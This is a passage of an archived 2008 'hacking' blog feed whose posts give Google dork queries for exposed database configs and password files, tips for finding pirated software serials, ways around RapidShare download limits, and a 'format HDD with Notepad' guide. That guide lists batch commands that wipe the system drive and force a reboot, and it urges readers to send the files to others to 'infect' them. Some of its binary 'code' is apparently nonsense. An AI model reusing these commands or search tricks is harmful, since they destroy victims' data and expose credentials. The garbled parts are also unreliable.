DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=intitle%3A%22Index+of%22+config.php&quot;&gt;intitle:&quot;Index of&quot; config.php&lt;/a&gt;&lt;br /&gt;This search brings up sites with &quot;config.php&quot; files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=eggdrop+filetype%3Auser+user&quot;&gt;eggdrop filetype:user user&lt;/a&gt;&lt;br /&gt;These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=intitle%3Aindex.of.etc&quot;&gt;intitle:index.of.etc&lt;/a&gt;&lt;br /&gt;This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=filetype%3Abak+inurl%3A%22htaccess%7Cpasswd%7Cshadow%7Chtusers%22&quot;&gt;filetype:bak inurl:&quot;htaccess|passwd|shadow|htusers&quot;&lt;/a&gt;&lt;br /&gt;This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).&lt;br /&gt;Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;Let&#39;s pretend you need a serial number for windows xp pro.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;In the google search bar type in just like this - &lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22Windows+XP+Professional%22+94FBR&quot;&gt;&quot;Windows XP Professional&quot; 94FBR&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of &#39;fake&#39; porn sites that trick you.&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;or if you want to find the serial for winzip 8.1 - &quot;Winzip 8.1&quot; 94FBR &lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  87. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  88. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  89. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  90. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/7448905499668976755/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=7448905499668976755' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/7448905499668976755'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/7448905499668976755'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/google-hacking.html' title='Google Hacking'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-6806549456383974919</id><published>2008-11-24T04:18:00.000-08:00</published><updated>2008-11-24T04:19:31.862-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Reset Vista and XP Admin Passwords"/><title type='text'>Reset Vista and XP Admin Passwords</title><content type='html'>&lt;span style=&quot;font-weight: bold; font-style: italic; font-family: arial;&quot;&gt;Reset Vista and XP Admin Passwords&lt;/span&gt; Info: If you ever forget your computer&#39;s password this little program will reset it on restart. Small .iso file less than 5 MBS!! Put it on a cd or a usb drive and Enjoy it!!! Simple Instructions to boot via CD: This can be burned to CD using basically any burner program you like that support writing ISO-images. The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup. Simple Instructions to boot via USB: 1. Copy all files from this CD onto the USB drive. It cannot be in a subdirectory on the drive. You do not need delete files already on the drive. 2. Install the bootloader: On the USB drive, there should now be a file &quot;syslinux.exe&quot;. Run this from a command line, like this: j:\syslinux.exe -ma j: replace j with some other letter if your USB drive is on another drive letter than j: If it says nothing, it did install the bootloader. Tested CD and USB method with success! Download Link : - &lt;a href=&quot;http://rapidshare.com/files/149693846/xp-vista-pw_reset.rar&quot;&gt;http://rapidshare.com/files/149693846/xp-vista-pw_reset.rar&lt;/a&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  91. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  92. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  93. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  94. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/6806549456383974919/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=6806549456383974919' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/6806549456383974919'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/6806549456383974919'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/reset-vista-and-xp-admin-passwords.html' title='Reset Vista and XP Admin Passwords'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-7252556380254419210</id><published>2008-11-04T08:44:00.001-08:00</published><updated>2008-11-04T08:44:46.606-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="IF YOU ARE NOT A PREMIUM USER ON RAPIDSHARE:"/><title type='text'>IF YOU ARE NOT A PREMIUM USER ON RAPIDSHARE:</title><content type='html'>Get 1 Year FREE Rapidshare Account &lt;a class=&quot;fw_link_website&quot; href=&quot;http://premiumforfree.com/index.php?referral=33499&quot;&gt;HERE&lt;/a&gt; &lt;p&gt;&lt;span id=&quot;fullpost&quot;&gt;1. Go to the page you want to download&lt;br /&gt;2. Select &lt;span style=&quot;font-weight: bold;&quot;&gt;FREE&lt;/span&gt; button&lt;br /&gt;3. In the address bar put the following:  &lt;span style=&quot;font-weight: bold;&quot;&gt;javascript:alert(c=0)&lt;/span&gt;&lt;br /&gt;4. Click &lt;span style=&quot;font-weight: bold;&quot;&gt;OK&lt;/span&gt;&lt;br /&gt;5. Click &lt;span style=&quot;font-weight: bold;&quot;&gt;OK&lt;/span&gt; to the pop-up box&lt;br /&gt;6. Enter the captcha&lt;br /&gt;7. Download Your File&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;OR Go To These Links And Type In Your Download &lt;/p&gt;                                                             &lt;div class=&quot;post&quot;&gt;1.  khongbiet.com (.com currently out of bandwidth)&lt;br /&gt;2.  rapidhack (.com /  .de)&lt;br /&gt;3. free-premium-links (.com 5attempt /day)&lt;br /&gt;4. Rapidshare.co.in ( .com  5 attempt / day)&lt;br /&gt;5. &lt;a href=&quot;http://www.downloadmyupload.com/&quot; target=&quot;_blank&quot;&gt;http://www.downloadmyupload.com&lt;/a&gt;&lt;br /&gt;6. &lt;a href=&quot;http://computeraxes.com/rapid&quot; target=&quot;_blank&quot;&gt;http://computeraxes.com/rapid&lt;/a&gt;&lt;br /&gt;7. &lt;a href=&quot;http://www.premiumrapid.com/&quot; target=&quot;_blank&quot;&gt;http://www.premiumrapid.com&lt;/a&gt;&lt;br /&gt;8. &lt;a href=&quot;http://www.rapidshack.us/&quot; target=&quot;_blank&quot;&gt;http://www.rapidshack.us/&lt;/a&gt;&lt;br /&gt;9. &lt;a href=&quot;http://megaez.com/&quot; target=&quot;_blank&quot;&gt;http://megaez.com/&lt;/a&gt;&lt;br /&gt;10. &lt;a href=&quot;http://khongbiet.com/&quot; target=&quot;_blank&quot;&gt;http://khongbiet.com/&lt;/a&gt;&lt;br /&gt;11. &lt;a href=&quot;http://mymegalink.net/&quot; target=&quot;_blank&quot;&gt;http://mymegalink.net/&lt;/a&gt;&lt;br /&gt;12. &lt;a href=&quot;http://rapid-hook.com/&quot; target=&quot;_blank&quot;&gt;http://rapid-hook.com/&lt;/a&gt;&lt;br /&gt;13.  &lt;a href=&quot;http://www.rapidl.com/&quot; target=&quot;_blank&quot;&gt;http://www.rapidl.com/&lt;/a&gt;&lt;br /&gt;14. &lt;a href=&quot;http://www.rapidrip.com/&quot; target=&quot;_blank&quot;&gt;http://www.rapidrip.com/&lt;/a&gt;&lt;br /&gt;15. &lt;a href=&quot;http://www.rapidsharepremiumlinkgenerator.com/&quot; target=&quot;_blank&quot;&gt;http://www.rapidsharepremiumlinkgenerator.com/&lt;/a&gt;&lt;br /&gt;16. &lt;a href=&quot;http://rapidlysharing.com/&quot; target=&quot;_blank&quot;&gt;http://rapidlysharing.com/&lt;/a&gt;&lt;br /&gt;17. &lt;a href=&quot;http://www.rapidshareplus.com/&quot; target=&quot;_blank&quot;&gt;http://www.rapidshareplus.com/&lt;/a&gt;&lt;br /&gt;18. &lt;a href=&quot;http://www.fastlister.net/rs/&quot; target=&quot;_blank&quot;&gt;http://www.fastlister.net/rs/&lt;/a&gt;&lt;br /&gt;19. &lt;a href=&quot;http://www.lcheat.com/rs7/&quot; target=&quot;_blank&quot;&gt;http://www.lcheat.com/rs7/&lt;/a&gt;&lt;br /&gt;20. &lt;a href=&quot;http://rapid-ripping.com/&quot; target=&quot;_blank&quot;&gt;http://rapid-ripping.com/&lt;/a&gt;&lt;br /&gt;20. &lt;a href=&quot;http://x92.org/&quot; target=&quot;_blank&quot;&gt;http://x92.org/&lt;/a&gt;&lt;br /&gt;21. &lt;a href=&quot;http://www.rapidleechers.com/&quot; target=&quot;_blank&quot;&gt;http://www.rapidleechers.com/&lt;/a&gt;&lt;br /&gt;22. &lt;a href=&quot;http://www.rapidshare-premium-downloader.com/&quot; target=&quot;_blank&quot;&gt;http://www.rapidshare-premium-downloader.com/&lt;/a&gt;&lt;br /&gt;23  &lt;a href=&quot;http://www.premium4me.com/rapid.html&quot; target=&quot;_blank&quot;&gt;http://www.premium4me.com/rapid.html&lt;/a&gt;&lt;br /&gt;24. &lt;a href=&quot;http://www.premiumrapid.com/rapid.html&quot; target=&quot;_blank&quot;&gt;http://www.premiumrapid.com/rapid.html&lt;/a&gt;&lt;br /&gt;25. &lt;a href=&quot;http://www.download-crazy.com/rapid&quot; target=&quot;_blank&quot;&gt;http://www.download-crazy.com/rapid&lt;/a&gt;&lt;br /&gt;26. &lt;a href=&quot;http://www.grab-w.net/&quot; target=&quot;_blank&quot;&gt;http://www.grab-w.net/&lt;/a&gt;&lt;br /&gt;27.  &lt;a href=&quot;http://www.t5f.net/&quot; target=&quot;_blank&quot;&gt;http://www.t5f.net/&lt;/a&gt;&lt;br /&gt;28. &lt;a href=&quot;http://www.rapid-premium.wb.st/&quot; target=&quot;_blank&quot;&gt;http://www.rapid-premium.wb.st/&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  95. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  96. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  97. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  98. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/7252556380254419210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=7252556380254419210' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/7252556380254419210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/7252556380254419210'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/if-you-are-not-premium-user-on.html' title='IF YOU ARE NOT A PREMIUM USER ON RAPIDSHARE:'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-1336421555394093893</id><published>2008-11-04T08:35:00.001-08:00</published><updated>2008-11-04T08:35:59.637-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="How to Format A HDD With Notepad"/><title type='text'>How to Format A HDD With Notepad</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.&lt;/span&gt;&lt;/div&gt; &lt;p&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt; &lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Step 1.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Copy The Following In Notepad Exactly as it says&lt;/span&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;01001011000111110010010101010101010000011111100000&lt;/span&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Step 2.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Save As An EXE Any Name Will Do&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Step 3.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Send the EXE to People And Infect&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;OR&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;format c:\ /Q/X — this will format your drive c:\&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;01100110011011110111001001101101011000010111010000 100000011000110011101001011100&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;0010000000101111010100010010111101011000&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;format d:\ /Q/X — this will format your dirve d:\&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;01100110011011110111001001101101011000010111010000 100000011001000011101001011100&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;0010000000101111010100010010111101011000&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;format a:\ /Q/X — this will format your drive a:\&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;01100110011011110111001001101101011000010111010000 100000011000010011101001011100&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;0010000000101111010100010010111101011000&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;del /F/S/Q c:\boot.ini — this will cause your computer not to boot.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;01100100011001010110110000100000001011110100011000 101111010100110010111101010001&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;00100000011000110011101001011100011000100110111101 101111011101000010111001101001&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;0110111001101001&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;try to figure out urself rest&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;cant spoonfeed&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;its working&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Do not try it on your PC. Don’t mess around this is for educational purpose only&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;still if you cant figure it out try this&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;go to notepad and type the following:&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;@Echo off&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Del C:\ *.*|y&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;save it as Dell.bat&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;want worse then type the following:&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;@echo off&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;del %systemdrive%\*.*/f/s/q&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;shutdown -r -f -t 00&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;and save it as a .bat file&lt;/span&gt;&lt;/p&gt;&lt;/div&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  99. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  100. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  101. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  102. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/1336421555394093893/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=1336421555394093893' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1336421555394093893'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1336421555394093893'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/how-to-format-hdd-with-notepad.html' title='How to Format A HDD With Notepad'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry></feed>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid Atom 1.0" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=http%3A//dracohacker.blogspot.com/feeds/posts/default

Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda